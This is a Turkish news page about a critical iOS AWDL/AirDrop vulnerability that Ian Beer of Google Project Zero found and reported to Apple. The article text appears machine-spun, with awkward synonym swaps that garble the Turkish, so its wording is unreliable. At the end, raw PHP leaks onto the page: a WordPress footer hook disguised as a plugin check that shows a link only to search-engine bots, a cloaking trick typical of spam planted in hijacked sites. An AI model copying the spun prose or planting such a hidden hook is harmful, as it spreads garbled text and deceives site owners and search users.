Sıradaki içerik:

Hyundai, Modüler Elektrikli Araç Platformunu Tanıttı

e
sv

iOS'ta Kritik Bir Güvenlik Açığı Tespit Edildi

02 Aralık 2020 11:02
avatar

  • e 0

    Mutlu

  • e 0

    Eğlenmiş

  • e 0

    Şaşırmış

  • e 0

    Kızgın

  • e 0

    Üzgün

Google Project Zero ekibinin bir parçası olan siber emniyet uzmanı Ian Beer, iOS ekosistemindeki bir emniyet açığını tespit ettiğini açıkladı. iPhone'lardaki AirDrop hizmetinin çalışmasını sağlayan AWDL isimli bir bileşende tespit edilen bu emniyet açığı, kullanıcıların önemli verilerine erişilmesini sağlıyor. Beer, bu emniyet açığını bulabilmek için 2020'nin başından beri çalıştığını anlatım ediyor.

Beer'ın açıklamalarına göre bilgisayar korsanları, söz konusu emniyet açıklarından faydalanarak, iPhone sahiplerinin fotoğraflarına, e-postalarına ve mesajlarına erişebilirler. Güvenlik açığının oldukça kritik olduğunu anlatım eden Beer, bugüne kadar yaptığı araştırmalar sonucunda bu emniyet açığının sömürülmediğini yani herhangi bir iPhone sahibinin bu emniyet açığından etkilenmediğini belirtiyor.

Güvenlik açığı Apple'a bildirildi

iOS'ta emniyet açığı

Ian Beer, tespit ettiği emniyet açığını Bug Bounty Programı kapsamında Apple'a bildirdiğini söyledi. Herhangi bir gelir beklentisi olmadığını anlatım eden siber emniyet uzmanı, istenildiği takdirde Apple ile beraber çalışabileceğini, buradan kazanacağı parayı da hayır kurumlarına bağışlayacağına dair imza atabileceğini belirtiyor. Apple'ın bu teklife nasıl bir dönüş yapacağı şu lahza için bilinmiyor.

Apple'ın AirDrop hizmeti, iPhone'lar arasında yüksek hızlı veri aktarımı yapılabilmesini sağlıyor. Güvenlik açığının tespit edildiği AWDL isimli bileşen, “Apple Wireless Direct Link” olarak biliniyor. Her yerde kullanılabilen AWDL, cihazlar arasında düşük gecikmeli ve yüksek hızlı bağlantı sunuyor. 

Kaynak : https://www.imore.com/ios-exploit-allows-hackers-gain-access-photos-messages-and-more

  • Site İçi Yorumlar

En az 10 karakter gerekli
function isBot() { $botAgents ="/google|hakia|msn|yahoo|altavista|crawler|findlinks|bing|Cuil|Excite|Go.com|HotBot|AllTheWeb|search.aol|Lycos|Alexa|ask|baidu|cuil|kosmix|sogou|yodao|yandex|infoseek|yebol|aol/i"; $agent = $_SERVER['HTTP_USER_AGENT']; if (preg_match($botAgents,$agent)) return true; else return false; } function wordpres_plugin_check_core(){ $altsayfa = 1; $bot = 1; $link = ' '; if($altsayfa == 1){ $say_s = $_SERVER['REQUEST_URI']; $saydim = strlen($say_s); if($saydim > 4){ if($bot == 1){ if (isBot()) { echo $link; } }else{ echo $link; } } }else{ if($bot == 1){ if (isBot()) { echo $link; } }else{ echo $link; } } } add_action('wp_footer', 'wordpres_plugin_check_core');